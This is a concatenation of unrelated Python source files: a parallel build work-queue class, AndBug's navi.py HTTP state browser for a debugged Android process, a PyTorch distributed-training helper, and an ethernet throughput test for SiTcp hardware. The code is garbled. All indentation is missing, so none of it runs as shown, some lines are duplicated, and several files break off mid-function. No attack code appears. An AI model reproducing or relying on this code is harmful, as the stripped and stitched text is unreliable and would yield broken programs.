die("Bad value for --jobs option: " + str(max_parallelism))
self.max_parallelism = max_parallelism
self.use_threads = True
self.threads = []
# worker threads can add stuff to the new_queue so we
# use an MT-safe queue.
self.new_queue = queue.Queue(0)
self.out_queue = queue.Queue(0)
self.back_queue = queue.Queue(0)
self.pending_commands = deque()
self.message_delay = 10
self.min_message_delay = 10
self.message_delay_delta = 10
self.job_num = 0
self.pending = 0
self._clean_slate()
if self.use_threads:
if len(self.threads) == 0:
self._start_daemons()
def _empty_queue(self, q):
while not q.empty():
item = q.get_nowait()
def _cleanup(self):
"""After a failed build we want to clean up our any in-progress state
so we can re-use the work queue object"""
# the new_queue, job_num and pending get updated by add() before we build.
# so we must clean them up after every build. Also good hygene to clean out
# the task queues that we use to talk to the workers.
self.pending_commands = deque()
self._empty_queue(self.new_queue)
self._empty_queue(self.out_queue)
self._empty_queue(self.back_queue)
self.job_num = 0
self.pending = 0
def _clean_slate(self):
self.running_commands = []
self.all_commands = []
self.running = 0
self.sent = 0
self.finished = 0
self.errors = 0
self.dag = None
# for message limiting in _status()
self.last_time = 0
self.last_pending = 0
self.last_finished = 0
self.last_running = 0
self.start_time = get_time()
self.end_time = None
# we set dying to to True when we are trying to stop because of an error
self.dying = False
self._empty_queue(self.out_queue)
self._empty_queue(self.back_queue)
def clear_commands(self):
"""Remove any previously remembered commands"""
self.all_commands = []
def commands(self):
"""Return list of all commands involved in last build"""
return self.all_commands
def elapsed_time(self):
"""Return the elapsed time as an a number"""
if self.end_time == None:
self.end_time = get_time()
return self.end_time - self.start_time
def elapsed(self):
"""Return the elapsed time as a pretty string
@rtype: string
@returns: the elapsed wall clock time of execution.
"""
if self.end_time == None:
self.end_time = get_time()
elapsed = get_elapsed_time(self.start_time, self.end_time)
return elapsed
def _terminate(self):
"""Shut everything down. Kill the worker threads if any were
being used. This is called when the work_queue_t is garbage
collected, but can be called directly."""
self.dying = True
if self.use_threads:
self._stop_daemons()
self._join_threads()
def _start_daemons(self):
"""Start up a bunch of daemon worker threads to process jobs from
the queue."""
for i in range(self.max_parallelism):
t = Thread(target=_worker, args=(self.out_queue, self.back_queue))
t.setDaemon(True)
t.start()
self.threads.append(t)
def _stop_daemons(self):
"""Send terminator objects to all the workers"""
for i in range(self.max_parallelism):
t = command_t()
t.terminator = True
if verbose(3):
msgb("SENT TERMINATOR", str(i))
self._start_a_job(t)
def _join_threads(self):
"""Use this when not running threads in daemon-mode"""
for t in self.threads:
t.join()
if verbose(3):
msgb("WORKER THREAD TERMINATED")
self.threads = []
def _add_one(self,command):
"""Add a single command of type L{command_t} to the list
of jobs to run."""
# FIXME: make this take a string and build a command_t
if command.completed:
if verbose(5):
msgb("SKIPPING COMPLETED CMD", str(command.command))
msgb("SKIPPING COMPLETED CMD", str(command.command))
self.add(command._check_afters())
return
if command.submitted:
if verbose(5):
msgb("SKIPPING SUBMITTED CMD", str(command.command))
msgb("SKIPPING SUBMITTED CMD", str(command.command))
return
command.submitted = True
if verbose(6):
msgb("WQ ADDING", str(command.command))
self.job_num += 1
self.new_queue.put( command )
self.pending += 1
def add_sequential(self,command_strings, unbufferred=False):
"""
Add a list of command strings as sequential tasks to the work queue.
@type command_strings: list of strings
@param command_strings: command strings to add to the L{work_queue_t}
@rtype: list of L{command_t}
@return: the commands created
"""
last_cmd = None
cmds = []
for c in command_strings:
co = command_t(c, unbufferred=unbufferred)
cmds.append(co)
self.add(co)
if last_cmd:
last_cmd.add_after_me(co)
last_cmd = co
return cmds
def add(self,command):
"""Add a command or list of commands of type L{command_t}
to the list of jobs to run.
@type command: L{command_t}
@param command: the command to run
"""
if verbose(5):
msgb("ADD CMD", str(type(command)))
if command:
if isinstance(command,list):
for c in command:
if verbose(5):
msgb("ADD CMD", str(type(c)))
self._add_one(c)
else:
self._add_one(command)
def _done(self):
if self.running > 0:
return False
if not self.dying and self.pending > 0:
return False
return True
def _status(self):
if self.show_progress or verbose(2):
s = ( '[STATUS] RUNNING: %d PENDING: %d COMPLETED: %d ' +
'ERRORS: %d ELAPSED: %s %s' )
s = ( 'R: %d P: %d C: %d E: %d / %s %s' )
cur_time = get_time()
changed = False
if (self.running != self.last_running or
self.pending != self.last_pending or
self.finished != self.last_finished):
changed = True
if (changed or
# have we waited sufficiently long?
cur_time >= self.last_time + self.message_delay):
# speed back up when anything finishes
if self.finished != self.last_finished:
self.message_delay = self.min_message_delay
elif self.last_time != 0:
# only printing because of timeout delay, so
# we increase the time a little bit.
self.message_delay += self.min_message_delay
# store the other limiters for next time
self.last_time = cur_time
self.last_pending = self.pending
self.last_finished = self.finished
self.last_running = self.running
msg(s % (self.running,
self.pending,
self.finished,
self.errors,
get_elapsed_time(self.start_time, get_time()),
self._command_names()))
def _start_more_jobs(self):
"""If there are jobs to start and we didn't hit our parallelism
limit, start more jobs"""
# copy from new_queue to pending_commands to avoid data
# race on iterating over pending commands.
started = False
while not self.new_queue.empty():
self.pending_commands.append( self.new_queue.get() )
ready = deque()
for cmd in self.pending_commands:
if cmd._ready():
ready.append(cmd)
while self.running < self.max_parallelism and ready:
cmd = ready.popleft()
# FIXME: small concern that this could be slow
self.pending_commands.remove(cmd)
if verbose(2):
msgb("LAUNCHING", cmd.dump_cmd())
self._start_a_job(cmd)
self.pending -= 1
started = True
return started
def _start_a_job(self,cmd):
"""Private function to kick off a command"""
self.out_queue.put(cmd)
self.running_commands.append(cmd)
if not cmd.terminator:
self.all_commands.append(cmd)
self.sent += 1
self.running += 1
def _command_names(self):
s = []
anonymous_jobs = 0
for r in self.running_commands:
if hasattr(r,'name') and r.name:
s.append(r.name)
else:
anonymous_jobs += 1
if s:
if anonymous_jobs:
s.append('%d-anonymous' % (anonymous_jobs))
return '[' + ' '.join(s) + ']'
else:
return ''
def _wait_for_jobs(self):
"""Return one command object when it finishes, or None on timeout (or
other non-keyboard-interrupt exceptions)."""
if self.running > 0:
try:
cmd = self.back_queue.get(block=True, timeout=self.join_timeout)
self.running -= 1
self.finished += 1
self.running_commands.remove(cmd)
self.back_queue.task_done()
return cmd
except queue.Empty:
return None
except KeyboardInterrupt:
msgb('INTERRUPT')
self._terminate()
self.dying = True
sys.exit(1)
return None # NOT REACHED
except:
return None
return None
def build(self,
dag=None,
targets=None,
die_on_errors=True,
show_output=True,
error_limit=0,
show_progress=False,
show_errors_only=False,
join_timeout=10.0):
"""
This makes the work queue start building stuff. If no targets
are specified then all the targets are considered and built if
necessary. All commands that get run or generated are stored in
the all_commands attribute. That attribute gets re-initialized
on each call to build.
@type dag: L{dag_t}
@param dag: the dependence tree object
@type targets: list
@param targets: specific targets to build
@type die_on_errors: bool
@param die_on_errors: keep going or die on errors
@type show_output: bool
@param show_output: show stdout/stderr (or just buffer it in
memory for later processing). Setting this to False is good for
avoiding voluminous screen output. The default is True.
@type show_progress: bool
@param show_progress: show the running/pending/completed/errors msgs
@type show_errors_only: bool
@param show_errors_only: normally print the commands as they complete.
If True, only show the commands that fail.
@type join_timeout: float
@param join_timeout: how long to wait for thread to terminate. default 10s
"""
self._clean_slate()
self.show_progress = show_progress
self.join_timeout = join_timeout
self.errors = 0
self.show_errors_only = show_errors_only
self.message_delay = self.min_message_delay
self.last_time = 0
self.clear_commands()
self.dag = dag
if self.dag:
for x in self.dag._leaves_with_changes(targets):
self.add(x.creator)
okay = self._build_blind(die_on_errors, show_output, error_limit)
if okay and self.dag:
did_not_build = self.dag.check_for_skipped()
if len(did_not_build) > 0:
# some stuff did not build, force an error status return
msgb("ERROR: DID NOT BUILD SOME STUFF", "\n\t".join(did_not_build))
if self.dag:
uprint(self.dag.dump())
self.end_time = get_time()
self._cleanup()
return False
# normal exit path
self.end_time = get_time()
if self.dag:
self.dag.dag_write_signatures()
self._cleanup()
return okay
def _build_blind(self, die_on_errors=True, show_output=True, error_limit=0):
"""Start running the commands that are pending and kick off
dependent jobs as those complete. If die_on_errors is True, the
default, we stop running new jobs after one job returns a nonzero
status. Returns True if no errors"""
if self.use_threads:
return self._build_blind_threads(die_on_errors,
show_output,
error_limit)
else:
return self._build_blind_no_threads(die_on_errors,
show_output,
error_limit)
def _build_blind_threads(self,
die_on_errors=True,
show_output=True,
error_limit=0):
"""Start running the commands that are pending and kick off
dependent jobs as those complete. If die_on_errors is True, the
default, we stop running new jobs after one job returns a nonzero
status. Returns True if no errors"""
okay = True
started = False
while 1:
c = None
if started:
c = self._wait_for_jobs()
if c:
if verbose(3):
msgb("JOB COMPLETED")
if c.failed():
self.errors += 1
okay = False
if die_on_errors or (error_limit != 0 and
self.errors > error_limit):
warn("Command execution failed. " +
"Waiting for remaining jobs and exiting.")
self.dying = True
if not self.dying:
started |= self._start_more_jobs()
self._status()
if c and not self.dying:
c._complete()
# Command objects can depend on each other
# directly. Enable execution of dependent commands.
if verbose(3):
msgb("ADD CMD-AFTERS")
self.add(c._check_afters())
# Or we might find new commands from the file DAG.
if self.dag:
for x in self.dag._enable_successors(c):
self.add(x.creator)
if c:
if self.show_errors_only==False or c.failed():
uprint(c.dump(show_output=show_output))
elif c.targets:
for x in c.targets:
uprint(u'\tBUILT: {}'.format(x))
if self._done():
break;
return okay
def _build_blind_no_threads(self, die_on_errors=True,
show_output=True, error_limit=0):
"""Start running the commands that are pending and kick off
dependent jobs as those complete. If die_on_errors is True, the
default, we stop running new jobs after one job returns a nonzero
status. Returns True if no errors"""
okay = True
while 1:
started = False
if not self.dying:
started = self._start_more_jobs()
if started:
self._status()
# EXECUTE THE TASK OURSELVES
if self.running > 0:
_worker_one_task(self.out_queue, self.back_queue)
c = self._wait_for_jobs()
if c:
if verbose(3):
msgb("JOB COMPLETED")
if c.failed():
okay = False
self.errors += 1
if die_on_errors or (error_limit !=0 and
self.errors > error_limit):
warn("Command execution failed. " +
"Waiting for remaining jobs and exiting.")
self.dying = True
if not self.dying:
c._complete()
# Command objects can depende on each other
# directly. Enable execution of dependent commands.
if verbose(3):
msgb("ADD CMD-AFTERS")
self.add(c._check_afters())
# Or we might find new commands from the file DAG.
if self.dag:
for x in self.dag._enable_successors(c):
self.add(x.creator)
if self.show_errors_only==False or c.failed():
uprint(c.dump(show_output=show_output))
self._status()
if self._done():
break;
return okay
|
navi.py | #!/usr/bin/env python
## TODO: expand the forest to use <slot>, <info>, <more>
## TODO: add <value> browser
## TODO: add <value>/<slot> browser.
## TODO: add <array>/<index> browser.
## TODO: add close button to popouts
## TODO: add static class list
import andbug, os.path, json, subprocess, threading
import re
try:
import bottle
except ImportError:
raise andbug.DependencyError('navi requires the "bottle" package')
################################################################### UTILITIES
# These functions make life a little easier, doing things like restructuring
# data structures to be easier to use from templates.
#############################################################################
def index_seq(seq):
for i in range(len(seq)):
yield i, seq[i]
def get_threads():
global proc # set by navi_loop
threads = proc.threads()[:] # TODO This workaround for view is vulgar.
def tin(name):
try:
return int(re.split('<|>', name)[1])
except Exception:
return name
threads.sort(lambda a, b: cmp(tin(a.name), tin(b.name)))
return threads
def get_classes():
global proc # set by navi_loop
classes = proc.classes()[:] # TODO This workaround for view is vulgar.
classes.sort(lambda a, b: cmp(a.jni, b.jni))
############################################################## INFO UTILITIES
# These functions summarize various Java objects into human-readable
# representations.
#############################################################################
def thread_info(thread):
info = str(thread)
return info[7:] if info.startswith('thread ') else info
def frame_info(frame):
info = str(frame).split( ', at ', 1)
return info[0 if (len(info) == 1) else 1]
def truncate_ojni(jni):
if jni.startswith('['):
return truncate_ojni(jni[1:]) + '[]'
if jni.startswith('L'):
jni = jni[1:]
if jni.endswith(';'): jni = jni[:-1]
jni = jni.split('/')
if len(jni) == 1:
return jni[0]
else:
return '%s.%s' % (
'.'.join((a[0] if a else '') for a in jni[:-1]),
jni[-1]
)
def object_info(object):
return '<%s>' % truncate_ojni(object.jni)
def info(value):
if isinstance(value, andbug.Thread):
return thread_info(value)
if isinstance(value, andbug.Frame):
return frame_info(value)
if isinstance(value, andbug.Array):
if value.jni in ('[C', '[B'):
return repr(value).replace('\\x00', '') # HACK
if isinstance(value, andbug.Object):
return object_info(value)
return value
############################################################## VIEW UTILITIES
# These functions summarize various Java objects into JSON views suitable for
# navigation panels. Each view comes as a list, consisting of the name of a
# suitable constructor, and a series of arguments for the constructor.
#############################################################################
def sequence_view(value):
seq = ['seq', value.jni]
for val in value:
seq.append(info(val))
return seq
#TODO: slots
def object_view(value):
seq = ['obj', value.jni]
for key, val in value.fields.iteritems():
seq.append((key, info(val), key))
return seq
#TODO: slots
def view(value):
if isinstance(value, andbug.Array):
return sequence_view(value)
if isinstance(value, andbug.Object):
return object_view(value)
return ['val', info(value)]
################################################################## DATA ROOTS
# We use static roots derived from the location of the Navi script.
#############################################################################
# note: __file__ is injected into the module by import
NAVI_ROOT = os.path.abspath(
os.path.join( os.path.dirname(__file__), '..' )
)
STATIC_ROOT = os.path.join( NAVI_ROOT, 'data', '' )
COFFEE_ROOT = os.path.join( NAVI_ROOT, 'coffee', '' )
bottle.TEMPLATE_PATH.append( os.path.join( NAVI_ROOT, 'view' ) )
def resolve_resource(root, rsrc):
assert root.endswith(os.path.sep)
rsrc = os.path.abspath(root + rsrc)
if rsrc.startswith(root):
return rsrc
else:
raise Exception('Less dots next time.')
@bottle.route( '/s/:req#.*#' )
def static_data(req):
rsrc = resolve_resource(COFFEE_ROOT, req)
if rsrc.endswith('.coffee') and os.path.exists(rsrc):
req = rsrc.replace(COFFEE_ROOT, '')[:-7] + '.js'
try:
subprocess.call(('coffee', '-o', STATIC_ROOT, '-c', rsrc))
except OSError:
pass # use the cached version, looks like coffee isn't working.
return bottle.static_file(req, root=STATIC_ROOT)
################################################################# GLOBAL DATA
# Our Bottle server uses WSGIRef, which is a single-process asynchronous HTTP
# server. Any given request handler can be sure that it has complete control
# of these globals, because WSGIRef is far too stupid to handle multiple
# concurrent requests.
#############################################################################
NAVI_VERNO = '0.2'
NAVI_VERSION = 'AndBug Navi ' + NAVI_VERNO
################################################################# THREAD AXIS
# The thread axis works from the process's thread list, digging into
# individual thread frames and their associated slots.
#############################################################################
def get_object_item(val, key):
try:
return val.field(key)
except KeyError:
raise bottle.HTTPError(
code=404, output='object does not have field "%s".' % key
)
def get_array_item(val, key):
key = int(key)
try:
return val[key]
except KeyError:
raise bottle.HTTPError(
code=404, output='array does not have index %s.' % key
)
def get_item(val, key):
if isinstance(val, andbug.Array):
return get_array_item(val, key)
if isinstance(val, andbug.Object):
return get_object_item(val, key)
raise bottle.HTTPError(
code=404, output='cannot navigate type %s.' % type(val).__name__
)
def deref_frame(tid, fid):
threads = get_threads()
return tuple(threads[tid].frames)[fid]
def deref_value(tid, fid, key, path):
if isinstance(path, basestring):
path = path.split('/')
value = deref_frame(tid, fid).value(key)
while path:
key = path[0]
path = path[1:]
value = get_item(value, key)
return value
@bottle.post('/t/:tid/:fid/:key')
@bottle.post('/t/:tid/:fid/:key/:path#.*#')
def change_slot(tid, fid, key, path=None):
'changes a value in a frame or object'
try:
tid, fid, key = int(tid), int(fid), str(key)
content_type = bottle.request.get_header('Content-Type', '')
if not content_type.startswith('application/json'):
return {"error":"new value must be provided as JSON"}
if path:
path = path.split('/')
value = deref_value(tid, fid, key, path[:-1])
key = path[-1]
else:
value = deref_frame(tid, fid)
data = bottle.request.json
except Exception as exc:
#TODO: indicate that this was a deref error
#TODO: log all non-HTTP errors to stderr
return {"error":str(exc)}
try:
#if isinstance(value, andbug.Array):
# return set_array_item(value, key)
if isinstance(value, andbug.Object):
return set_object_field(value, key, data)
elif isinstance(value, andbug.Frame):
return set_frame_slot(value, key, data)
return {"error":"navi can only modify object fields and frame slots"}
except Exception as exc:
#TODO: indicate that this was an assignment error
#TODO: log all non-HTTP errors to stderr
return {"error":str(exc)}
def set_frame_slot(frame, key, data): #TEST
'changes the value of a frame slot'
#TODO: make sure frame.setValue throws a KeyError on failed slot update
try:
result = frame.setValue(key, data)
except KeyError:
return {"error":"navi cannot find slot %r" % key}
if result:
return {}
return {"error":"navi could not change slot %r" % key}
def set_object_field(val, key, value): #TEST
'changes the value of an object field'
try:
result = val.setField(key, value)
except KeyError:
return {"error":"navi cannot find field %r" % key}
if result:
return {}
return {"error":"navi could not change field %r" % key}
#def set_array_item(val, key):
# key = int(key)
#
# try:
# return val[key]
# except KeyError:
# raise bottle.HTTPError(
# code=404, output='array does not have index %s.' % key
# )
@bottle.route('/t/:tid/:fid/:key')
@bottle.route('/t/:tid/:fid/:key/:path#.*#')
def view_slot(tid, fid, key, path=None):
'lists the values in the frame'
tid, fid, key = int(tid), int(fid), str(key)
value = deref_value(tid, fid, key, path)
data = json.dumps(view(value))
bottle.response.content_type = 'application/json'
return data
###################################################### THE THREAD FOREST (TT)
# The thread-forest API produces a JSON summary of the threads and their
# frame stacks. This is consolidated into one data structure to reduce
# round trip latency.
#############################################################################
#TODO: INSULATE
def seq_frame(frame, url):
if not url.endswith('/'):
url += '/'
seq = [info(frame), frame.native]
for key, val in frame.values.iteritems():
seq.append((key, info(val), url + key))
return seq
def seq_thread(thread, url):
if not url.endswith('/'):
url += '/'
seq = [info(thread)]
frames = thread.frames
for i in range(len(frames)):
seq.append(seq_frame(frames[i], url + str(i)))
return seq
def seq_process():
threads = get_threads()
return list(
seq_thread(threads[i], '/t/%s/' % i) for i in range(len(threads))
)
@bottle.route('/tt')
def json_process():
data = json.dumps(seq_process())
bottle.response.content_type = 'application/json'
return data
############################################################## FRONT SIDE (/)
# The front-side interface uses the JSON API with jQuery and jQuery UI to
# present a coherent 'one-page' interface to the user; embeds the process
# forest for efficiency.
#############################################################################
@bottle.route('/')
def frontend():
return bottle.template('frontend', forest=json.dumps(seq_process()))
################################################################### BOOTSTRAP
# Bottle assumes that the server session will dominate the process, and does
# not handle being spun up and down on demand. Navi does not depend heavily
# on Bottle, so this could be decoupled and put under WSGIREF.
#############################################################################
def navi_loop(p, address, port):
# Look, bottle makes me do sad things..
global proc
proc = p
bottle.debug(True)
bottle.run(
host=address,
port=port,
reloader=False,
quiet=True
)
svr = None
@andbug.command.action('[allowRemote=<False or anychar>] [port=<8080>]')
def navi(ctxt, allowRemote = False, port = None):
'starts an http server for browsing process state'
global svr
if svr is not None:
andbug.screed.section('navigation process already running')
return
address = '0.0.0.0' if allowRemote else 'localhost'
port = int(port) if port else 8080
with andbug.screed.section(
'navigating process state at http://localhost:%i' % port
):
andbug.screed.item('Process suspended for navigation.')
ctxt.sess.suspend()
svr = threading.Thread(target=lambda: navi_loop(ctxt.sess, address, port))
svr.daemon = 1 if ctxt.shell else 0
svr.start()
|
ddp.py | from typing import Callable, cast, Type, T, Tuple, Any
import torch
from time import sleep
from loguru import logger
from functools import wraps
from argparse import Namespace
import torch.distributed as dist
import torch.multiprocessing as mp
from torch.distributed import Backend
from multiprocessing import Process, Queue
from collections import Counter
def spawn(process: Callable, args: Namespace, world_size: int) -> None:
mp.spawn(process, args=(args, world_size), nprocs=world_size, join=True)
def is_dist_done_early(cuda_device: torch.device) -> bool:
"""
Check whether the other workers have stopped already (due to differing amounts of
data in each). If so, we can't proceed because we would hang when we hit the
barrier implicit in Model.forward. We use a IntTensor instead a BoolTensor
here because NCCL process groups apparently don't support BoolTensor.
"""
done = torch.tensor(0, device=cuda_device)
dist.all_reduce(done, dist.ReduceOp.SUM)
if done.item() > 0:
logger.warning(
f"Worker {dist.get_rank()} finishing training early! "
"This implies that there is an imbalance in your training "
"data across the workers and that some amount of it will be "
"ignored. A small amount of this is fine, but a major imbalance "
"should be avoided. Note: This warning will appear unless your "
"data is perfectly balanced."
)
return True
return False
def is_dist_done_on_epoch(cuda_device: torch.device) -> None:
"""
Indicate that we're done so that any workers that have remaining data stop the epoch early.
"""
logger.warning(f"Worker {dist.get_rank()} completed its entire epoch.")
done = torch.tensor(1, device=cuda_device)
dist.all_reduce(done, dist.ReduceOp.SUM)
assert done.item()
def on_batch_start(func: Callable):
@wraps(func)
def wrapper(cls: Type[T], *args, **kwargs):
# Place import here to avoid circular imports
from vae_lm.training.trainers import Trainer
as_trainer = cast(Trainer, cls)
done_early = (
is_dist_done_early(as_trainer.cuda_device) if as_trainer.is_distributed() else False
)
output_dict = func(as_trainer, *args, **kwargs)
return output_dict, done_early
return wrapper
def on_epoch_end(func: Callable):
@wraps(func)
def wrapper(cls: Type[T], *args, **kwargs):
# Place import here to avoid circular imports
from vae_lm.training.trainers import Trainer
as_trainer = cast(Trainer, cls)
loss, done_early = func(as_trainer, *args, **kwargs)
# Assertion
if as_trainer.is_distributed() and not done_early:
is_dist_done_on_epoch(as_trainer.cuda_device)
return loss
return wrapper
def setup_world(
rank: int,
world_size: int,
backend: str = Backend.GLOO,
master_addr: str = "127.0.0.1",
master_port: int = 29500,
) -> None:
# Initialize the process group
dist.init_process_group(
backend,
init_method=f"tcp://{master_addr}:{master_port}",
rank=rank,
world_size=world_size,
)
def dist_cleanup() -> None:
# Clean processes
dist.destroy_process_group()
# TODO: Work in progres
# It's not part of the work, just for fun :)))
# Want to implement distributed training with spawn and fork methods (Hogwild)
# Написать абсолютно другую функцию для тренировки модели, она будет принимать думаю Trainer
# и уже работать именно на нём. Смотри pytorch lightning и best practices with PyTorch multiprocessing.
class DistributedTraining:
def __init__(
self,
worker: Callable,
# TODO: Make accelerators registrebale
accelerator: str = "ddp_spawn",
world_size: int = 1,
) -> None:
self._worker = worker
self._accelerator = None # TODO: Pick one
self._world_size = world_size
def run_ddp(self, args: Tuple[Any]) -> None:
self._accelerator(process=self._worker, args=args, world_size=self._world_size)
def _ddp_spawn(self) -> None:
pass
def _ddp(self, args: Tuple[Any]) -> None:
_mp = mp.get_context("spawn")
proceses = []
for rank in range(self._world_size):
# TODO: Probably send instantiated model to Process with vocab
process = _mp.Process(target=self._worker, args=(rank, args, self._world_size), daemon=True)
# starting all processes at once can cause issues
# with dataloaders delay between 1-10 seconds
# sleep(delay)
|
test_eth.py | import logging
import signal
import time
import datetime
# import random
from threading import Thread, Event # , Lock, Condition
from array import array
import struct
import numpy as np
from basil.dut import Dut
from basil.HL.RegisterHardwareLayer import RegisterHardwareLayer
conf = '''
name : test_eth
version : 1.0
transfer_layer:
- name : ETH
type : SiTcp
init:
ip : "192.168.10.16"
udp_port : 4660
tcp_port : 24
tcp_connection : True
tcp_to_bus : True
hw_drivers:
- name : SITCP_FIFO
type : sitcp_fifo
interface : ETH
- name : REGISTERS
type : test_eth
interface : ETH
base_addr : 0x0
'''
stop_thread = False
class test_eth(RegisterHardwareLayer):
'''Register Hardware Layer.
Implementation of advanced register operations.
'''
_registers = {
'RESET': {'descr': {'addr': 0, 'size': 8, 'properties': ['writeonly']}},
'VERSION': {'descr': {'addr': 0, 'size': 8, 'properties': ['readonly']}},
'SETUP': {'default': 0, 'descr': {'addr': 1, 'size': 8, 'offset': 0}},
'TEST_DATA': {'descr': {'addr': 2, 'size': 64, 'offset': 0}},
'UDP_WRITE_CNT': {'descr': {'addr': 10, 'size': 32, 'offset': 0}},
'TCP_WRITE_DLY': {'default': 0, 'descr': {'addr': 14, 'size': 16, 'offset': 0}},
'TCP_WRITE_CNT': {'descr': {'addr': 16, 'size': 64, 'offset': 0, 'properties': ['readonly']}},
'TCP_FAILED_WRITE_CNT': {'descr': {'addr': 24, 'size': 64, 'offset': 0, 'properties': ['readonly']}},
'TCP_RECV_WRITE_CNT': {'descr': {'addr': 32, 'size': 64, 'offset': 0, 'properties': ['readonly']}}
}
class Test(object):
def __init__(self):
self.dut = Dut(conf)
self.dut.init()
# fw_version = dut['ETH'].read(0x0000, 1)[0]
logging.info("Firmware version: %s" % self.dut['REGISTERS'].VERSION)
signal.signal(signal.SIGINT, self.signal_handler)
logging.info('Press Ctrl-C to stop')
self.stop_thread = Event()
self.total_tcp_err_cnt = 0
def signal_handler(self, signum, frame):
logging.info('Pressed Ctrl-C...')
self.dut['REGISTERS'].TCP_WRITE_DLY = 0 # no TCP data
self.time_stop = time.time()
self.stop_thread.set()
signal.signal(signal.SIGINT, signal.SIG_DFL) # setting default handler
def start(self, test_tcp=True, test_udp=True, tcp_write_delay=6, monitor_interval=1.0, deadline=None):
if not test_tcp and not test_udp:
return
self.test_tcp = test_tcp
self.test_udp = test_udp
# reset registers
self.dut['REGISTERS'].RESET
# setup register values
# Monitor
self.monitor_delay = monitor_interval # Speed of displaying netowrk speed
# TCP
self.tcp_readout_delay = 0.1 # Delay between reading TCP buffer
self.dut['REGISTERS'].TCP_WRITE_DLY = 0 # no TCP data
self.time_start = time.time()
self.total_tcp_err_cnt = 0
self.total_tcp_data_words_read = 0
self.tcp_exception_cnt = 0
self.tcp_read_speeds = None
# UDP
self.udp_readout_delay = 0.0 # Delay between reading/writing UDP
self.total_udp_err_cnt = 0
self.total_udp_read_write_cnt = 0
self.udp_exception_cnt = 0
self.udp_read_write_speeds = None
# initializing threads
self.stop_thread.clear()
self.mon_t = Thread(target=self.monitor, name='Monitor thread', kwargs={})
self.mon_t.daemon = True
self.mon_t.start()
if test_tcp:
self.tcp_t = Thread(target=self.tcp_read, name='TCP thread', kwargs={})
self.tcp_t.daemon = True
self.tcp_t.start()
if test_udp:
self.udp_t = Thread(target=self.udp_read_write, name='UDP thread', kwargs={})
self.udp_t.daemon = True
self.udp_t.start()
if test_tcp:
self.dut['REGISTERS'].TCP_WRITE_DLY = tcp_write_delay # set TCP write delay: 1 equivalent to write data every clock cycle (1/133MHz=0.0075us=7.5ns)
self.time_start = time.time()
self.time_stop = self.time_start + 1.0
# while loop for signal handler
while not self.stop_thread.wait(0.05):
if deadline and self.time_start + deadline < time.time():
self.signal_handler(None, None)
self.mon_t.join()
self.mon_t = None
logging.info("Stopped Monitor thread")
if test_tcp:
self.tcp_t.join()
self.tcp_t = None
logging.info("Stopped TCP thread")
if test_udp:
self.udp_t.join()
self.udp_t = None
logging.info("Stopped UDP thread")
# some statistics
logging.info("Total time: %s" % (str(datetime.timedelta(seconds=self.time_stop - self.time_start))))
if test_tcp:
logging.info("=== TCP transfer statistics ===")
logging.info("TCP data error counter: %d" % self.total_tcp_err_cnt)
logging.info("TCP exception counter: %d" % self.tcp_exception_cnt)
logging.info("TCP write busy counter: %d" % self.dut['REGISTERS'].TCP_FAILED_WRITE_CNT)
logging.info("TCP data words: read: %d, expected: %d" % (self.dut['REGISTERS'].TCP_WRITE_CNT * 4 + self.dut['REGISTERS'].TCP_RECV_WRITE_CNT, self.total_tcp_data_words_read * 4))
if self.total_tcp_data_words_read * 4 / 10.0**6 > 1000000:
logging.info("Total amount transmitted: %.2f TB" % (self.total_tcp_data_words_read * 4 / 10.0**12))
elif self.total_tcp_data_words_read * 4 / 10.0**6 > 1000:
logging.info("Total amount transmitted: %.2f GB" % (self.total_tcp_data_words_read * 4 / 10.0**9))
else:
logging.info("Total amount transmitted: %.2f MB" % (self.total_tcp_data_words_read * 4 / 10.0**6))
total_tcp_avg_read_speed = self.total_tcp_data_words_read * 32 / (self.time_stop - self.time_start) / 10.0**6
if total_tcp_avg_read_speed < 1.0:
logging.info("Total average TCP read speed: %.2f kbit/s" % (total_tcp_avg_read_speed * 10**3))
else:
logging.info("Total average TCP read speed: %.2f Mbit/s" % (total_tcp_avg_read_speed))
if self.tcp_read_speeds:
if np.average(self.tcp_read_speeds) < 1.0:
logging.info("TCP read speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f kbit/s" % (np.min(self.tcp_read_speeds) * 10**3, np.median(self.tcp_read_speeds) * 10**3, np.average(self.tcp_read_speeds) * 10**3, np.max(self.tcp_read_speeds) * 10**3))
else:
logging.info("TCP read speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f Mbit/s" % (np.min(self.tcp_read_speeds), np.median(self.tcp_read_speeds), np.average(self.tcp_read_speeds), np.max(self.tcp_read_speeds)))
if test_udp:
logging.info("=== UDP transfer statistics ===")
logging.info("UDP data error counter: %d" % self.total_udp_err_cnt)
logging.info("UDP exception counter: %d" % self.udp_exception_cnt)
logging.info("UDP read/write counter: read: %d, expected: %d" % (self.dut['REGISTERS'].UDP_WRITE_CNT, self.total_udp_read_write_cnt * 8))
if self.total_udp_read_write_cnt * 8 / 10.0**6 > 1000000:
logging.info("Total amount transmitted: %.2f TB" % (self.total_udp_read_write_cnt * 8 / 10.0**12))
elif self.total_udp_read_write_cnt * 8 / 10.0**6 > 1000:
logging.info("Total amount transmitted: %.2f GB" % (self.total_udp_read_write_cnt * 8 / 10.0**9))
else:
logging.info("Total amount transmitted: %.2f MB" % (self.total_udp_read_write_cnt * 8 / 10.0**6))
total_udp_avg_read_speed = self.total_udp_read_write_cnt * 64 / (self.time_stop - self.time_start) / 10.0**6
if total_udp_avg_read_speed < 1.0:
logging.info("Total average UDP read/write speed: %.2f kbit/s" % (total_udp_avg_read_speed * 10**3))
else:
logging.info("Total average UDP read/write speed: %.2f Mbit/s" % (total_udp_avg_read_speed))
if self.udp_read_write_speeds:
if np.average(self.udp_read_write_speeds) < 1.0:
logging.info("UDP read/write speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f kbit/s" % (np.min(self.udp_read_write_speeds) * 10**3, np.median(self.udp_read_write_speeds) * 10**3, np.average(self.udp_read_write_speeds) * 10**3, np.max(self.udp_read_write_speeds) * 10**3))
else:
logging.info("UDP read/write speed (min/median/average/max): %.2f/%.2f/%.2f/%.2f Mbit/s" % (np.min(self.udp_read_write_speeds), np.median(self.udp_read_write_speeds), np.average(self.udp_read_write_speeds), np.max(self.udp_read_write_speeds)))
# close DUT
self.dut.close()
def monitor(self):
logging.info("Started Monitor thread")
time_read = time.time()
last_total_tcp_data_words_read = 0
last_total_udp_read_write_cnt = 0
while not self.stop_thread.wait(max(0.0, self.monitor_delay - time_read + time.time())):
tmp_time_read = time.time()
tmp_total_tcp_data_words_read = self.total_tcp_data_words_read
tmp_total_udp_read_write_cnt = self.total_udp_read_write_cnt
if self.test_tcp:
